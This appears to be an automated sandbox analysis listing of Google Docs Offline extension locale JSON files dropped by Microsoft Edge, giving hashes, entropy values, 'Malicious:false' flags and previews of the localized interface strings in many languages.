                                                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1895
Entropy (8bit):4.28990403715536
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1042
Entropy (8bit):5.3945675025513955
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2535
Entropy (8bit):3.8479764584971368
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1028
Entropy (8bit):4.797571191712988
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):994
Entropy (8bit):4.700308832360794
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2091
Entropy (8bit):4.358252286391144
Encrypted:false
Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
